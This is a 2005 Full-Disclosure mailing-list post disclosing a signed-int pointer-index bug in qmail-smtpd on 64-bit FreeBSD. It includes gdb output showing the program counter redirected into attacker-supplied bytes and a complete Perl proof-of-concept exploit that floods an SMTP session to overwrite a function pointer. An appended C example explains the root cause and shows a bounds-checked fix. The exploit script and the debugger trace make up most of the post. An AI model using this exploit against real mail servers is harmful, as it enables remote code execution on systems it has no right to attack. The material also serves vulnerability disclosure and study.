Re: [Full-disclosure] 64 bit qmail fun

From: Georgi Guninski (guninskiguninski.com)
Date: Sun May 15 2005 - 07:48:49 CDT


On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
>
> 2. pointer + signed int in commands.c
> int i;
> ...
> i = str_chr(cmd.s,' ');
> ...
> cmd.s[i] = 0;
>

problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of
virtual memory.

original djb's qmail was compiled with debug info, no optimizations and not
stripped.

Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34
34 cmd.s[i] = 0;
(gdb) p cmd
$12 = {s = 0x4b507000 'Ь' <repeats 200 times>..., len = 3036683527,
           ^^^^^^^^^^
  a = 3184650962}
(gdb) p i
$13 = -1258283773
(gdb) p &cmd.s[i]
$14 = 0x508d03 "K"
(gdb) next
36 for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break;
(gdb) p cmd
$15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527,
       ^^^^^^^^^^^^^
  a = 3184650962}
(gdb) p &ssout
$16 = (substdio *) 0x507500
(gdb) p &ssout.op
$17 = (int (**)()) 0x507518
(gdb) cont

Program received signal SIGTRAP, Trace/breakpoint trap.
0x000000000050cbac in ?? ()
(gdb) x/i $rip
0x50cbac: int3
(gdb) p ssout
$18 = {
  x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>, p = 0, n = 32, fd = 2, op = 0x50cbab}
(gdb) info stack
#0 0x000000000050cbac in ?? ()
#1 0x0000000000405bce in allwrite (op=0x50cbab, fd=2,
    buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15
#2 0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35
#3 0x0000000000405d6e in substdio_put (s=0x507500,
    buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64
#4 0x0000000000405efc in substdio_puts (s=0x507500,
    buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100
#5 0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n")
    at qmail-smtpd.c:43
#6 0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54

(gdb) x/i helohost.s
0x50c000: int3
(gdb) p &cmd
$19 = (stralloc *) 0x508d00

qmlong-pubvvv5.pl - run on freebsd 5.4 amd64

------------------------
#!/usr/bin/perl -w

# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
        PeerPort=>$port) || die("socket");

#my $sock;
#open ($sock, '+>',"/dev/null") || die("open");

##my $wriaddr = 0xb5bfa660 - 0x140;
my $wriaddr = 0xb5001e43 - 0x140;

my $wrimeg = int($wriaddr/(1024*1024)) ;
my $wrioff = $wriaddr % (1024*1024) ;

my $headdr = 0x42aa6000;
my $heameg = int($headdr/(1024*1024));
my $heaoff = $headdr % (1024*1024);

print $wrimeg . " " . $wrioff;

my $payload="\xcc" x (1024*1024);
my $i=0;
print $sock "HELO ";
while(42)
{
        print $sock $payload;
        $i++;

        print "${i}\n";
        if ($i == $heameg) {last;}
}
print $sock "v" x $heaoff;
print $sock "\r\n";
print "\nHELO sent\n";

$i=0;
while(42)
{
        print $sock $payload;
        $i++;
        print "${i}\n";
        if ($i == $wrimeg) {last;}
}

my $zer1 = "v" x $wrioff . " vvv\r\n";
print $zer1;
print $sock $zer1;
print "\nspace/zero sent\n";
$i=0;

my $vvover= "AB" . ("v" x (0x500-2));

$vvover .= pack("Q",0x0102030405060708); #x
$vvover .= pack("I",0x10);
$vvover .= pack("I",0x20);
$vvover .= pack("I",0x2);
$vvover .= pack("I",0x42);
$vvover .= pack("Q",0x50cbab); #op

$vvover .= "\x21" . "\n" x 100;
## ^^^ ssin.x + 1
print $sock $vvover;

print "\nprobably done\n";
while(42) {};

--
where do you want bill gates to go today?
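
The root cause of problem #2 (an unsigned position from str_chr() stored in a signed int, then used as a pointer index on a 64-bit target), as an added example that is not part of the post above or of qmail's source. It assumes an LP64 platform such as FreeBSD amd64, str_chr_u is a constructed stand-in for qmail's str_chr(), and the numbers are the ones shown in the gdb session (cmd.s = 0x4b507000, i = -1258283773):

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for qmail's str_chr(): position of the first 'ch'
 * in 's' (or the length if absent), returned as an unsigned int. */
unsigned int str_chr_u(const char *s, char ch)
{
    unsigned int i = 0;
    while (s[i] && s[i] != ch) ++i;
    return i;
}

/* Address written by `cmd.s[i] = 0;` once the position has been stored in
 * an `int i`.  For pos >= 2^31 the int is negative (modulo wrap on gcc and
 * clang; implementation-defined in ISO C) and on LP64 it is sign-extended
 * to 64 bits before the pointer add, so the store lands far below cmd.s.
 * Done on integers, not a real pointer, so nothing is dereferenced. */
uintptr_t buggy_target(uintptr_t base, unsigned int pos)
{
    int i = (int)pos;
    return base + (int64_t)i;
}

/* Same computation with the index kept in the type str_chr() returns. */
uintptr_t fixed_target(uintptr_t base, unsigned int pos)
{
    return base + (uint64_t)pos;
}

/* Hardened terminator write: refuse any index outside [0, len).
 * Returns 1 if the byte was written, 0 if the index was rejected. */
int terminate_at(char *s, unsigned int len, unsigned int pos)
{
    if (pos >= len) return 0;
    s[pos] = 0;
    return 1;
}

int main(void)
{
    /* Values from the gdb session in the post: cmd.s and str_chr()'s result */
    uintptr_t base = 0x4b507000;
    unsigned int pos = 3036683523u;
    printf("int i           = %d\n", (int)pos);
    printf("buggy &cmd.s[i] = 0x%lx\n", (unsigned long)buggy_target(base, pos));
    printf("fixed &cmd.s[i] = 0x%lx\n", (unsigned long)fixed_target(base, pos));
    printf("rejected: %d\n", !terminate_at((char[]){"HELO x"}, 6, pos));
    return 0;
}
```

buggy_target() reproduces the 0x508d03 address gdb printed for &cmd.s[i]; keeping the index unsigned, and checking it against cmd.len before the store, keeps the write inside the buffer.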

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/